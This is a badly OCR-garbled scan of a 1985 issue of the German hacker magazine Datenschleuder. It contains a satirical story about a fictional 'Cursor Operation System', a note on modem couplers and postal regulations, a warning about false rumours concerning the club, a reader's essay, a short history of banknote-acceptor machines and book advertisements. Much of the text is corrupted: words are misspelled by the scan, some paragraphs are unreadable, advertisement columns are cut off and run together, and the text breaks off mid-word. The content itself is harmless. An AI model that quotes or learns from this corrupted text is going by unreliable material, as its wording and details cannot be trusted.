85. D-2000 Hamburg 20 - Redaktionsadresse ebenda, elektronisch IMCA:CHAOS-TEAM - Eigendruck im co 
Selbstverlag - Datenkonvertierung und Salz: BITS - Neue Jahresbezugspreise; DM 60 normal. DM 30 
Schüler u. ä.. ab DM 100 Förderabo - die veröffentlichten Beiträge sind urheberrechtlich geschützt, b 
Verviellältigungen für gewerbliche Zwecke verpflichten zur Gebührenzahlung an die VG Wort, Abt. Wi., -S 
Goetheslr. 49. 8000 München 2 - Weilerverbreitung in kostenlosen elektronischen Informationsdiensten 3 
nach den in IMCA, Brett Datenschleuder. veröffentlichten Verbreitungsbedingungen gestaltet — die ds ist ~ 
abrufbar via IMCA und angeschlossene INTERMAIL-Hosts - COMBOX- CCC.NEV/S - RMI-NET - ZEV - -C 
einige Telelonboxen - in Btx '655321 mit Bestellservice - Kopier-Recht (Nachdruckrechl) für rrichl m 
gewerbliche Zwecke: Nur einwandfreie Vorlagen der neuesten Ausgate verwenden. Komplett vervieNältigen. ^ 
Abgabe nur kostenfrei. Auszüge nur mit dem Hinweis "aus datenschleuder 13. C9W7F‘. Oer Zusammenhang. .2 
aus dem die Vorlage stammt, sollte erkennbar bleiben. Zwei Belegexemplare an die ds-Redaktion ~ 
Compuskriple per Post auf Floppy 3,5" MSDOS/TOS/XF, 5 1/4* Sirius/C64nvr802 (nur notfalls IBM) oder ” 
papiern. via Datex (nur nach Absprache!) über ZCZC ans CHAOS-TEAM. impresUws 850929 2130 w 





Das Cursor Operation System COSY Nr. 13/85 

Die Seele eines neuen Cursor 

Quelle: Originaltext 29. 07. 65 (c) P.GLASER Erstveröffertlichung COMBOX:FEUiileton 

Die EntstehungsgeschicMe von COSY (Cursor Operation System) — Teil I 


Ich weite nicM - ich denke, mit der Zeit soll mir 
der auch lieber werden. 

(Goethe. Die Leiche des jungen Khoerser) 

Angetangen hatte alles im Frühjahr 1985 mit 
dem stilvollen Hinscheiden einer Grossreche- 
nantage: CURSOR LOST waren ihre letzten 
Worte gewesen, bevor sie in den hexadezimalen 
Hades hinabgefahren war. 

Diese schlichten Abschiedswone inspirierten 
einen Kreis junger Menschen: Sie hatten sich 
zu einem "Autonomen Sink Tank" (AST) zusam¬ 
mengeschlossen. Man war lange schon mit der 
phantasielosen Funktion und dem Erschei¬ 
nungsbild des landläufigen Cursor Vulgaris un¬ 
zufrieden gewesen: Ein langweiliger Lichtfieck, 
der. wenn er nicht grade blöde blinkte, nichts 
weiter als trostlos anzusehen war. Nun gab es, 
einen Innovalionsschub: Das Projekt VIC, der 
"Virulent Intensiv Cursor", wurde geboren. 

Noch in der selben Wixhe begann der AST mit 
der Konzeption eines umfangreichen und mul- 
lifunktionalen "Cursor Operation Systems" (CO¬ 
SY}. Optimal anwenderfreundlich, war es als 
"Gänzlich Userlos Arbeitende Schalteinheif" 
(GULASOI) angelegt. Online sollte es sich als 
"Wundersam Aktives Untergrundprogramm" 
(WAU) rege verbreiten. Pionierslimmung kam 
auf im AST-Labor. 

Für die Konstruktion mußte geeignetes 
Software-Werkzeug her: "Cursor Art Design" 
(CAO). "Cursor Action Modificator* (CAM) uno 
"Funny Unusuaf Cursor Kit" (FUCK) wurden in 
nachte- und wochenlanger Arbeit entwickelt. 
Dazu bediente der AST sich eines eigens für 
diesen Zweck spezifizierten Codes, des "Cursor 
Oriented Language Assembler" ((X)LA) mit ein¬ 
gedickter Fliesskomma-Konsislenz und einer 
an Andy Warhol ohenlierlen Grafik- 

Befehlsleiste. 

Ende März, in der zunehmenden Fröhsommer- 
wärme, wurde der erste Satz CURSOR ERRORS 
erstellt und pleiziert. Fortran konnten, über das 
CURSCDR LCföT hinaus, angezeigl werden: 

CURSOR RESTS ERROR 

(t«i gewerkschaftlich organisiertem Cursor), 
zuzüglich eines ausführlichen Hinweises auf die 
kf^leküwertralich vereinbarten Ruhezeiten. 

CURSOR HAPPY ERROR 

verbunden mit einem unkontrollierbar und kaut¬ 
schukhaft über den Bildschirm hüpfenden Cur¬ 
sor. Meist Vorzeichen für das baldige Erschei¬ 
nen eines weiblichen Cursor (HERSOR). 

CURSOR HYSTERIC ERROR 

verbunoen mit einem unregelmässig und hoch¬ 
frequent pulsenden Cursor und Quietschgeräu¬ 
schen. Meist Vorzeichen für das baldige Ver¬ 
schwinden eines weiblichen Cursor. 



CURSOR OUT OF GAS 

(nur bei benzin- und dieselgetriebenem Cursor). 
Sollte kein Tank-File vorhanden sein, kann man 
das Zeichen vor den Cursor setzen und ihn 
damit anschieben. 

CURSOR OUT OF SENSE 

Ein heikles Problem: Der Cursor Ist in eine 
Sinnkrise veHallen und hockt dumpf brütend in 
Spalte 0 einer beliebigen Zeile am Biidschirm- 
rand. 

CURSOR COLLAPS (N) 

wobei (N) eine Countdown-Variable Ist. die den 
geschätzten Zeitpunkt bis zur Disfunidion des 
Cursors in sec. anzeigt. Inzwischen hatte auch 
die Erweiterung der Gralikroutinen grosse Fort¬ 
schritte gemacht Je nach Art des Anwender¬ 
programms und des User-lnput-Verhaltens ver¬ 
mochte der Cursor nun selbstständig in Modifi¬ 
kationen zu verzweigen (von denen einige zur 
Dominanz über das gesamte aktuelle Programm 
führen). Endlich konnte der Cursor zeigen, was 
in ihm steckt Die AST-Grafikspeziaiisten nahen 
6 zentrale Routinen erarbeitet, die am T.Juni 
zusammen mit den neunen Fehlermeldungen als 
Version COSY 0.1 den ersten erfolgreichen 
Probelauf absolvierte. Zur Feier des Tages 
genehmigte man sich eine Flasche Frustschutz- 
mittel und rauchte dafür etwas weniger. 

DOKUMENTATION 

COSY Cursor Grafik Routinen 
CURD (Cursor Demoliert) 

COSY besitzt ein internes Zählregister welches 
fesihäii. wann ein User den Cursor allzu ruppig 
gegen den Bildschirmrand knallt. Sind mehr als 
sieben Versiösse registriert, wird ein zuneh¬ 
mend zerbeulter Cursor abgebildet, verbunden 
mit einem Hinweis auf seinen abnehmenden 
Wiederverkaufswerl. Vor dem 14.Verstoss wird 
eine Liste von Gebrauchtcursor-Shops ausge- 
geben und vor einem bevorstehenden CURSOR 
COLLAPS gewarnt 

CUFF (Cursor Diffundiert) 

Wird der Cursor zu sehr abgehetzt (Schnellsuch- 
läufe, OFU über 1200 Baud u.ä.). löst er sich in 
ein unscharfes Feld auf und verounsteischiiess- 
lich. CUFF gehört zu den Funktionen, die gege¬ 
benenfalls auch aus dem COSY-eigenen Zufalls- 
generator (COZ) aufgerufen werden. Zur Rück¬ 
gewinnung des diffundierten Cursors muss das 
ebenfalls vom AST entwickelte Steckmodul CU¬ 
RARE (Cursor Artificial Recreator)verwendet 
werden. Man erhält damit einen einwandfreien, 
nagelneuen Cursor, muss allerdings in Kauf 
nehmen, dass dafür das jeweilige Anwender¬ 
programm diffundiert 

EXCURS (E]q>andierender Cursor) 

Eine Funktion, die dem Timeout bei der Daten¬ 
fernübertragung ähnelt. Erfolgt innerhalb von 
60 Sekunden im aktuellen Programm keine 
halbwegs vernünftige Eingabe, b^innt der Cur¬ 
sor sich im Pulstgkt aufzublähen. Ist der Com¬ 
puter. ergänzend zu COSY. mit einem 
FLAUSCHWERK ausgestattet, hilft der Befehl 
REBLAEH. Hat der Cursor das ganze ßild- 
schirmformat ausgelüllt, kann nur noch CURA¬ 
RE benutzt werden. 

WRISC (Wrlgley’s Spearmint Cursor) 

Eine Spezialroutine für die Textverarbeitung; 
Wenn der erste Buchstabe eines eingegebenen 
Textes sich in dem Text zum 33.MaI wiederholt. 


bleibt der Ctursor daran kleben. Er lässt sich 
weiterhin frei bewegen, zieht aber, ausgehend 
von der Position des Buchstaben, inverse Strei¬ 
fen hinter sich her. Lässt man die Cursorlasten 
los. schnellt das Cursorband wieder auf die 
Buchstabenmarke Zurück. 

PACUR (Paeman Cursor) 

Eine Spezialrouline für das freie Programmie¬ 
ren, Sind dem Programmierer gerade einige 
besonders geschickte Algorilhmen eingefallen, 
kann COSY via COZ von Fall zu Fall PACUR 
aktivieren. Eingeleitel wird die Funktion durch 
die Meldung SYNTAX TERROR- Anschliessend 
werden mit einer Geschwindigkeit von einer 
Zeile pro Sekunde die letzten 2(X) Programm¬ 
zeilen wieder weggefressen. Ist die Hardware 
mit einem Tongenerator ausgestattet. erkennt 
man den Abschluss einer PACUR-Aktion an 
einem leisen Rülpsen. 

SCHWANG (Schwanensee Cursor) 

Im Anschluss an CURSOR COLLAPS 10) wird 
SCHWANG au^erufen. die dramatische Darstel¬ 
lung eines sterbenden Cursor, Die Abflachen 
der Blinkfrequenz bis zum agonischen Stillstand 
des Cursor, gefolgt von einem letzten Aufbäu¬ 
men in Karoposition und einer Pirouette. An¬ 
schliessend Klappt der Cursor nach unten und 
baumelt an der imaginären Zeileniinie. verliert 
schliesslich mit der einen, dann auch mit der 
anderen Ecke den Halt und trudelt entseelt und 
wie ein herbstlich leichtes Birkenblatt nach dem 
unteren Bildschirmrand. eaiywUM asosjo irce 

Schönheit in Wallen 

Zehn Stories von Peter Glaserr 
Peier wuchs als Bieisuli m Grat (Osiarreieh) awi. «yo die 
r>r>chwenigen Schnnsieiier für den Expon nergesiem wer¬ 
den. Er lebt seit drei Jahren als word »rocessor und 
"{»«tronic"-Programmierer m Hamburg Er hat sein Zim¬ 
mer um seinen CS4 drumrumgestaliel. Er will die Lyriker 
wegraiionarisieren und «erscrxcki Floppies Ijr Dichterle¬ 
sungen. Das SASiC-Gelühf in der MacKerbibel beschreibt 
diese Entwicklung. 

In der 'Scftönheil in Waffen* sind zehn Siones aus den 
leUlen xwei Jahren versammelt, die mit treffsicherer Ironie 
all das behandeln, was uns angehi: die Zukunft des 
Hackens. Liebessirmilationen mit roter Präzision, Dreiecks- 
beziehungen m Was Halt*, Lenesome Heroes m *Ein 
Mann bei sich'odercomic-lika Geschichten von Großstadt. 
Laridschafl und den Sehnsüchten der Menschen am Ende 
des 20. Jahrhunderts. Die Medienkulle faßt er kurz zusam¬ 
men: 'Der Bildschirm, das Lagerfeuer des 20. Jahrhun¬ 
derts. und davor; der Mensch der SiiziurrvZeit. unverän¬ 
dert: der vor dem Feuer hockende Mensch der Steinzeit, 
der schnaufend Nahrung m seinen Mund schaufelt und m 
das magische Flackern schaut." 

Oder: 'Wie Verhaltensforscher mit einer Affenfamiiie, so 
leben wir mn den großen Automaten und seinen An hagsem 
und beobachten. Das erste Wichtige ist. 'wie* leder von 
uns mit der Maschine lebt: wie sein Empfinden und sem 
Verhalten sich färbt: wie neue Mythen entstehen, neuer 
Alllag vorgeht " 

Und gleich online gehen mit dem Bucn - 
Poetromc für die Jackentasche. 

PETER GLASER. SCHÖNHEIT IN WAFFEN. 

10 Stories mit Illustrationen von Chris Scheuer. 
Graz (die feinen Punkte in seinen Pinselzeich¬ 
nungen macht er mit einem einhaarigen!) 
Ktepenheuer & Witsch. ISBN 3462017314 
kiwipglS.ws 850930 1722 



IO datenschleuder 13 ' Oktober 1985 ' C9927F ' Seite 5 





f-I.I ‘M .-.■ii’'#r W 


Rechtshilfe für Hacker 


Die Katze darf das. . . 

Ein Auszug der F&rnmefdeordnung der DBF. anscft/ieSend die dazugehörige Vetwaltungsanwei- 1 
sung, die alle Modembesitzer angeht I 

Paragraph 12 Abs. 7'. Der Teilnehmer darl die Tßilnehmereinnchtungcn nicht eigenmächtig ändern; 
unzulässig ist auch das eigenmächtige Einschalten selbstbeschafiter Apparate. Mil Fernsprechapparaten 
nicht elektrisch verbindbare Vorrichtungen und Gegenstände (Hillsvorrichtungen) durlen an diese nur 
angebracht werden, wenn sie von der Deutschen Bundespost zugelassen sind. Unzulässig ist auch das 
Bekleben posteigener Apparate. 

Auszug aus der VwAnw. zu Abs. 7: Im Falle der Benutzung eigenmächtig geänderter Apparate oder 
eigenmächtig eingeschalteter scibstbeschaffler Apparate werden die seibslbeschafiten Apparate abge- 
schallet und dem Teilnetimer, unter Hinweis auf die Unzulässigkeit seines Handelns, die privaten 
Einrichtungen AUSGEHÄNDIGT. Oie DBP stellt den nach den Teilrehmeninterlagen ausgewiesenen 
flegelbestand gebührenpflichtig (FGV 1.4 Nr. 10) wieder her. Sind die posteigenen Einrichtungen nicht 
mehr vorhanden oder sind sie beschädigt, so ist gemäß VwAnw 10 oder 11 wie im Falle des Verlustes 
oder der Beschädigung zu verfahren; für weitere Maßnahmen und eine evtl, strafrechtliche Verfolgung 
bei Benutzung nichtzugelassener Einrictitungeh sind die OPDn zuständig. 

Erläuterung: Eine dressierle Katze darf, soweit unser juristischer Sachverstand reicht, beim Klingeln 
abheben und den Hörer in den Kcppler packen. Sollte die Katze eine Prothese Iragen und damit abhoben, 
wäre das widerum verboten. 

Entsprechendes gilt für einen HiWi. der das für vielleicht 10 Mark pro Stunde macht Auch Hubmagneten 
gelten nicht als angebracht und smü - im Gegensatz zu direct connecl Modems - bereits jetzt zugelassen, 
ln England zugelassene Koooler werden hier benutzt Sollte die Post wagen, dagegen zu klagen, wird 
Sie rach unserer Einschätzung spätestens vor dom europäischen Gerichtshof unterliegen. Derzeit ist die 
uns bekannte Taktik der Post gegen fachgerechte OFU ohne Prüfnummer Verzögerung und Verwirrung, 
Zum Vergleich: Daß jeder Journalist per Kassettenrekorder am Telefon seine Texte an die Redaktion 
ubertragt, ist branchenüblich. Auch Ausländskorrespondenten haben keine Koppler mit Weltprufnummer. 
weil es so einen Unfug nicht gibt. Gute Produkte lunktionieren normentsprecnend. 

Wir planen, tn einer der nächsten Datenschleudern zu diesem Thema einen juristischen Fachbeilrag zu 
bringen. ässbüS imanlaIO.ws 850929 1923 


Konto Nr. 1 für Schmiergelder 

Gelegentlich kursieren die wildesten (Teschichten 
über den CCC durch die Szene. Ein Beispiel; Der 
CCC hafte von einet Bank eine runde Million Mark 
von Konto Nr, 1. dem für Schmiergelder, auf ein 
Schweizer Nummernkonto transferiert. Oie Dank 
soll anschließend einen Schlagertrupp geschickt 
haben, der mehrere CCC-ler krankenhausreif ge¬ 
schlagen haben soll. 

Solche Geschichten brachte ein B. aus Hamburg 
ih Umlauf. El behauptete außerdem. ’Gründungs- 
miighed" des CCC zu sein und zeigte - als 
Beweis" - seine Eintrittskarte zum Chaos Com- 
rnunicalionCongress'64 2u unserer Überraschung 
gab es eine Reihe von Leuten, die cerartiges 
glauben und tierisch sauer waren, wenn hinterher 
irgendwas vor B. aus Hamburg ausgeliehenes. sei 
es Hardware oder Geld, nicht zuruckkommt. Es i.st 
eine linke Sache, ausgeheheneoder zur Reparatur 
erhaltene Geräte weiierzuverscheuern (naiüriicn 
ohne Geld an den eigenlliohen Besitzer weiterzu- 
reichen). Die Kehrseite des Medienrummels über 
Hacker ist blindes Vertrauen in solche Leute, Genau 
wie mancher spende!, wenn einer an der Tür steht 
und sagl. er sei vom Roten Kreuz, gibt es jetzt nul 
dem CCC sowas, bloß sind die Türen an denen 
angeklopff wird diejenigen von Firmen und Com- 
puierfreaks. ln Hamburg wurde es theorelisch kei¬ 
ne halbe Slunde dauern, um einen Verein der S 
•Geschädiglen zu gründen, es gibt ihn aber trotz¬ 
dem nicht. Vielleicht liegt der Grund dann, daß es 

;edem peinlich ist. derart plump beschissen worden 
zu sein. Die Konsequenzen für alle smd einfach 
Wer derartig wirre Geschichten erzählt, disqualif-- 
zicrfsichsclbsf. Bci Unklarheiten hilft eine einfache 
Rückfrage bei CCC. KGB o.ä. 

Hacker haben es nicht nötig, sich zu verstecken, ct 
burkha13.ws 850922 


I U,',. '^ouk^i '■ 

CHEAP 




Behandlung von Computerkrankheiten 

I Digitales Denken 

Das leise (Jüdelüt von eckigen Zahlen 

J und runden Brüsten 

Kein Theater- oder Kinobesuch, Keine U-5ahrtahrt, 
. keine Veranstaltung, kein Treffen und kein Unter¬ 
richt mehr ohne das leise Oüdelut. 

Kaum über der Wahrnehmungsgrenze dringt es 
Uber unsere Ohrgange ins Hirn und meldet Punkt 
' Uhr, Halb Uhr oder Termin. 

Unuberl'orbares Signal der Quarzuhr ur>seres 
’ Nachbarn FunIMeierweiierdienachsieGerausch- 
' lirade Typ iiiie*litiii i oder nuep-micp 
I Dann wieder Stille, wir lauschen dem Programm 
! Was wir wahrgenommen haben, ist die if-carry- 
I ihen-pieo-Zeil: programmierte Zeit-Schmpsel. 

SO Kalorien lauten cie Daten, wenn ich ein Ei esse. 
Wenn ich meine Scheckkarte in den Auiomaten- 
schliiz schiebe, bm ich Nummer (gestrichen, ds) 
Meine Identität soll zahlbar, meme Sinne meßbar 
werden, um sie digital zu erlassen 
icn rieche mchi den Rasen des Fußbaiiteiöes beim 
darüber rennen, ich überprüfe meine Reaktionsge¬ 
schwindigkeit beim Compulerspiel 170(X) Punkte. 
Die Theorie sitzt im Kopf. Computermannchen 
platzen urio erscheinen, ungeberen, vom H'tnmei 
gefallen, neu auf dom Bildschirm 
Mitten in einer Conpulerzeitschrill zwischen greH- 
bunicr Spiefreklame und eckigem Design stoße ich 
auf zwei Seiten Haut und runde Brüste. Ein nackter 
Frauenkorper wirbt für ein Pornoblatl. 

Mein Körper nimmt seine Deformafion wahr, wenn 
er seine Bedürfnisse in Zigaretten und Alkohol 
kanalisiert oder in Therapiesitzungen herausbruflt. 
ein weiblicher Körper benutzbar zur Kompensalion 
unterdrückler Sinnichkeit 

Nachdruck (softly extended) eines Leserbrief an 
die taz von yi, dort abgedruckl am 29.5.84 

Das CHAOS-TEAM weist darauf hin, daß eine ge¬ 
wisse Koordination zwischen digitalem/analogen 
Denken/Tun lebensnotwendig ist und empfiehlt, um 
die beschrelbenen Leiden zu vermeiden, bei der 
Lektüre derartiger Computerzeitschriften vorsich¬ 
tig zu sein. Eine ähnliche Warnung zum Werbefern¬ 
sehen ist In der Hackerbibel und im wissenschaft¬ 
lichen Extrablatt zur IFA’85 (Beilage zur ds13J unter 
der Überschrift Verrückt durchs TV abgedruckl und 
verdient Beachtung. 

Sichere Heilmethoden sind nicht bekannt. Die Lek¬ 
türe der datenschfeuder soll zwar helfende, aber 
unklare Einflüsse auf verbissene Spieler ausüben. 
Es wäre verkürzt, zu behaupten, die dalensch/eu- 
der sei ein Heilmittel Im Sinne des Arzneimfttelge- 
setzes. digdnk13.ws 860928 1433 


— Sehr neehfl« Pnttlniniti-ii 
dieser Brielksslen wird nicht mehr am 
Wochenende oder in der Nacht geleert. 
Um dieca.20-30 Mrd.DM teure Verhahe- 
lung 2 U finanzieren muD die Post im 
Brielverkehr Koslen einsparen. 

Sie haben dalür sicher Verständnis! 


Ihre POST 


O! 


'• "ln der westlichen Welt ist das Tempo des Post- 
" dienstes seit langem vom Telefon und dem schnel¬ 
lt len Telexdiensl übcrtrollen. Eine wirklich wichtige 
s Angelegenheit wiid heute zuerst per Telefon und 
dann erst schriftlich übermittelt. Gleichzeitig ist der 
Posldicnst wesentlich langsamei geworden. Mit 
•• zunehmender Beschleunigung bei den allgemei- 
^ nen Dienstleistungen korrmt es zu einer Verlang- 
samung des allen Systems. Inelfizienz ist eine 
'• natürliche Begleiterscheinurrg Jeder Eleschleuni- 
s gung. da sie das alte System zerrüttet. Wenn das 

3 alte System zu zerfallen droht, rult man nach 

Spezialisten, dies es mit Hilfe der neuesten Tech- 
nologicn stutzen sollen. Die Temposteigeiung. die 
'• mit dem Posiaulo angelangen hat und dann mit 
der Luftpost lorigesetit wurde, hat im Bereich der 
^ Pcsisotfieiung zu Stockungen geführt." 

•• (MLuhan. Wohin steuert die Welt’) 

3 postoflO WS 850929 2330 
® Zuviel Werbung! 

|. Be-rtiPosiveisandCei SubsKnpuons^atmoa'edvr Hacherbib*»' 
T Teil t tiieb vnseee SeniJu'>g Iwin- «mtiicheri GetKjiirerniu'pi 
raihgen Ofofuncutg Werbung .im latw.h#r» Oer 0-v verdaen- 
■ iiQo Seil« 3T iHat ,hi noerw»«» Uusi«n ooo» Senouci«'''* K.iuier 
Sie 0iitz9ugi") Hau« ««eh als Apnischcrz a&«< *cg«n c« 
J Ptriscs beim Oc2ugsb<n>Me>s «ul TAP A<.»gnCien Oie m ct»' 
Uach«ibibei ktjinen Piatr rneiii ranot.*'» inuhii» aus «nen E»«iv 
Diaien cne Soae cnTfe'm weroon Ci« nedjui'on peKbioil. OiO 
leWie Sc'ierrulWeiburtgdes Vreiegeisundd«' Oaie'ist.ivwuce' 
»auMU'eißen Um oi« Vorwcru'iq um di« rnorhiich vorscftwtn. 
den« Seite zu losen und kiaizuiietieo daS .Sie mein z«r>S'#ci 
wurde drucken w Si« nei>cnsicri«nd .-ib -jeOupr tj ws 9509)0 
0300 

Geldscheinfresser 

( Sie vermehfon sich anders als Kanirrchen. aber 

genauso schnell, die Schemscniuckcr Anfangs 
prüften sie die Echtheit der Geldscheine ähnlich 
s wie bei Münzen stimmen Lange. Breite und Dicke? 
;j Jeder Zettel im richtigen Formal wurde angenom¬ 
men Irgendwann ging das nicht mehr, weil an ein 
5 paar Stellen die Heiiigkeil gemessen wurde Auen 
. das oe'^ügie nicht Em ds-Leser schickte emen 
Zeitungsbericht Die betrogenen Automaten 
schluckten :eere Zettel, aut denen nur em paar 
Punkte markiert waren. Aber auch gute doppelsei- 
l'ge Fotokopien, die Crautone Wiedergaben, kamen 
mehl wieder raus. Die Papierauaiitat war wogen 
j der Probteme ml der Oickenmessurrg problema¬ 
tisch. Alte Geldscheine quollen durch Handschweiß 
f (grabbcl) auf Zudem waren die hochslgenaucn 
Meßpparaturen sehr teuer und emplindhch Oie 
, Automaten tehnien teilweise sogar druckfnschc 
Ongmalschemchen ab. Seit 197$ wurden moder¬ 
nere Automaten cmgcsetzl. Sie maßen die Inten- 
, siiai von verschiedenen Wellenlängen eines Prut- 
I iicMs. das vom Geldschein reflektiert wurde (auch 
im nicht sichtbar en Bereich). Oie Sensoren wurden 
vor jeder Messung elektronisch nachgeeicht Die 
, Lichlmeßpunkte waren eher Felder von em bis 
f zwei Ouadraizeniimeiern Größe, weil so Ver¬ 
schmutzungen und Oruckaoweichungen von bis zu 
^ 2 bis 3 mm ausgeglichen wurden Das Gerät wurde 

I in der Schweiz hergestelll urxJ zuerst eingesetzt 
und kostete um die 40(X) Mark. Aus einigen Kano- 
j nen, ahh. Kantonen wurden bald größere Abwei¬ 
sungsquoten gemeldet Schuld waren geringe Far¬ 
babweichungen von Neudrucken der Nationalban- 
, ken 1981 wurde dieses Problem durch Einsatz 
eines Mikroprozessors gelost. Der ermittelte nach 
jeder angenommenen Bankmtc einen neuen Farb- 
miiielwert und wurde bei der Installation vom 
I Monteur mit ca. 15 Random-Noten aus Supermärk- 
I len der Umgebung gefüttert (was passiert aei je 
fünf blauen, gelben und roten Scheinen? ). Mit 
dieser Methode werden nur rund 1-3'/o der echten 
Scheine zu Unrecht abgewiesen. Das scheint em 
Kompromiß zwischen Benutzbarkeit und Sicherheit 
zu sein Daß bei uns auch der Metallfaden geprüft 
wird, versieht sich inzwischen Die nächste Auto- 
matenversion wird noch mehr prüfen, aber auch 
mehrere Schemsorten. ganz gteich. m wetcher 
Richtung sie eingeschoben werden, annchmen 
können. De Banken debattieren gegenwärtig über 
die Einführung maschinenlesbaren Geldes - mit 
Strichcode??? 

Zukunflsvision; Kärtchen reinslecken und einza.h- 
len oder abheben. Bei gesperrlem Konto Fallgitter 
von hinten. 

Is42 Quellen: Archiv und vdi 1985-37;*^ 
geidprf3.ws 850929 2140 


ics * OÜ.totxir * CQQ«l7tr * Seite 6 


ZUKUNFTS-TECHNIKEN 
Funktion — Anwendung — Folgen 
Mißbrauch und alternative Chancen 

von Achim Schwarze 
Der Grüne Zweig 94 

Die Zukunft rollt auf breiter Front an. Zukunftstech¬ 
niken sind die Schrittmacher der Veränderung unseres 
Lebensraumes und unserer Kultur. 

Alle keine Ahnung! 

„Computer, Datennetze, Rechenzentren, Roboter, 
Gentechnik: natürlich existieren die. Wie sie funktio¬ 
nieren? Keine Ahnung. Will ich auch gar nicht wissen! 
Ich bin sowieso dagegen." So leicht kann man es sich 
machen. 



Suhuri 

fDerspel 



Die Zukunft rollt trotzdem an. 

In ihrer glitzernden fach-chinesischen Karosserie. Und 
keiner von uns Ignoranten kann sie bremsen oder gar 
lenken! Die Zukunftstechniken werden eingesetzt und 
krempeln unser Leben um. Wir bleiben die stolzen 
Eingeborenen, die sich sicher sind, daß ihre Kamele die 
Lastwagen des weißen Mannes überleben werden. Und 
sich dabei ganz gehörig täuschen. 


Hrsg. Warner Pieper & Konrad Volz 
ZUKUNFTSPERSPEKTIVEN 
MORGEN KINDER WIRDS WAS GEBEN 
Der Grüne Zweig 88 

Nehmen wir einmal an, es kommt nicht zum groi 
Mit was können, müssen, dürfen und wollen wi 
nen? Schon einmal konkrete Gedanken gemacht 
In diesem Buch gibt es eine geballte Ladung davi 


Wissen ist Mac ! t. 

Wer nicht riurchblickt, kann sich nicht zur Wehr setzen 
oder mivbsTtirnmen. Wer die Zukunft mitgestalten will, 
muß infoimien. sein. 

Aber Computer: das versteh ich nie! 

Bequemer geht es wirklich nicht! Aber diese Ausrede 
gilt nicht mehr: denn ,,ZUKUNFTS-TECHNIKEN" 
von Achim Schwarze führt im Schongang in die Ge¬ 
heimnisse modernster Technologie ein. Vorwissen 
braucht man nicht mitzubringen. 

Zukunftstechniken sind flexibel. 

Wie der Geist aus der Flasche dienen sie jedem Herrn. 
Vorausgesetzt, er kennt die Schlüsselworte. Warum soll 
man das eigentlich immer denen überlassen, die ohne¬ 
hin schon über soviel Macht verfügen und unseren Le¬ 
bensraum nur selten im Sinne seiner Bewohner gestal¬ 
ten? Lernen wir doch einfach selbst die magischen 
Worte. 

Alles halb so kompliziert! 

Wer die wenigen Konzepte vor allem der Datentechnik 
einmal verstanden hat, kann sich das meiste von allein 
erdenken. Wo sie eingesetzt werden, wem das nützt 
und was man anders machen könnte. 

ISBN 3-922708-94-3 220 Seitenj^pBB 

^ 

UERHER PIEPEI? ■, 

I OIE BRÜHE mFT 
bEO/EHEXFER/HEHrE 


der Autoren: Antonietia Lilly, Hans CusTo, Pete 
Buckminster Füller + Paul C. Msrtin, Achmed I 
Cillie Rentmeister, Tim Leary, Gertrud Wild, 
Neuss, Eugen Pietsch, 

Die Themen: Interspezie-Kommunikation, Rs 
nen, Bio Chips, Ersatiteilforschung für den Mi 
Video Spiele -•- Energie Zauberer -i- der 100. Ai 
alisierung innerer Riume -r Behinderten Hilfe 
V. a.m. Viele Fakten, wenig Fiction. 
Perspektiyen und Konzepte. Erklärungen der 
.neuen' Begriffe und Worte. 

Ein sanftes Verschworungsbuch mit Möglichl 
das Laban in der Zeitenwende. 

Global 2001. 

Gestaltung: Horst Turner 

156 S. DIN A4 ISBN 3-922708-S8-9flBH 


John C. Lilly 
DER SCIENTIST 
Der Grüne Zweig 91 


John C. Lilly ist einer der aufregendsten Fon 
unserer Zeit. Er machte die Landkarten des Gel 
bar, entwickelte den Isolationstank, arbeitet st 
ren mit Delphinen, unterzog sich intensiver Dr 
che und ist seit ein paar Jahren mit seiner Fra 
sammen. Hier beschreibt er spannend, wie er v< 
normalen Wissenschaftler zu einer herausrage 
sönlichkeit wurde. Sein Leben in seinen Wc 
Wunsch des Autors übersetzt von Werner Pieper 
,,Dr. John Lilly ist ein Einmann-Kompendium 
liehen Zivilisation." (New York Times) 

„Lilly hat eine Vision — was Wissenschaft s 
wenn sie nur die kraftvolle Methode mit der i 
Offenheit zu allen Dimensionen der Realität vt 
(Psychology Today) 



175 Seiten, in Cooperation mit 
dem Sphinx Verlag 














_ - ‘ö* 

. -i. 1-: -i. 






" ?? “" ® atctt^i^lcubc^ 


•t*'. Mg 

Fractals 
ItForm, Oance 
;and Dimension) 
Benoit B. Mandelbrot 
^977; 365 pp. 

$ postpaid 





Wohin steuert die Welt? 

Echte originale Faksimile-Imitation 
Mc Luhan beantwortet die Frage durch 
das Auf-den-Punkl-bringen von Alltagser¬ 
lebnissen. Am besten ein Beispiel; 
Bewundernde Freundin: Das ist aber ein 


The Sierplnthi Spongr 

Neues von Petra 

Ihr Kind braucht Monster! 

Positives Über Computerspiele steht in 
einer Anzeige für "Unser Kind. Schwan¬ 
gerschaft. Erziehung und Gesundheit" Un¬ 
ter der Überschrift "Ihr Kind braucht Mon¬ 
ster" wird den Computerspielen eine Art 
moderne Gebrüder-GrimrrvRolle zuge¬ 
teilt. petra 7/85, S. 133. 


tieren von Disks für andere Rechner ist 
deshalb nahezu unm^lich. Bei Fremd- 
Floppies könnte man ein Torlenstück raus¬ 
schneiden. auf dem sich alle ersten Sek¬ 
toren aller Spuren befinden. Bei der 1541 
ergäbe so ein Versuch Disketlensalat. Der 
Vorteil der 1541 liegt darin, Fornnate er¬ 
zeugen zu können, die keiner versteht. 
Gesamturtefl: Vom Kauf des Lexikons ist 
abzuraten, da es eher verwirrt. 


hübsches Baby, das Sie da haben! 
Mutter; Ach, das ist noch garnichts • Sie 
sollten mal sein Foto sehen! 

Diese Arl des Moralisierens vernebelt die 
Probleme und verhindert, daß den Opfern 
jemals Hilfe zuteil wird. 

Jedesmal, wenn eine neue Technologie 
ein neues Angebotsmilieu schafft, ver¬ 
schlingt oder umzingelt sie das vorange¬ 
gangene, von der älteren Technologie ge¬ 
schaffene Angebotsmilieu. Die Auswir¬ 
kung dessen ist, in der Sprache des Thea¬ 
ters, ein "Kulissenwechsel". 

Als der Buchdruck die neue umweltprä¬ 
gende Technologie war. wurde die ■'mitte¬ 
lalterliche Kulisse gewechselt". Die Druck¬ 
pressen spien Mengen alter Manuskripte 
aus und warfen die ganze Vergangenheit, 
die des Altertums und die des Mittelalters, 
sozusagen in den Schoß der Renaissance. 
Die Wiederherstellungskraft der elektrisch 
gespeicherten Information (kurz; der 
neuen Medien} ist heule so groß, daß sie 
uns nicht (nur) die Vergangenheit, sondern 
bereits die Gegenwart in den zeitgenössi¬ 
schen Schoß wirft. So wie der Renaissan¬ 
cemensch vom "Müll" oder den alten Klei¬ 
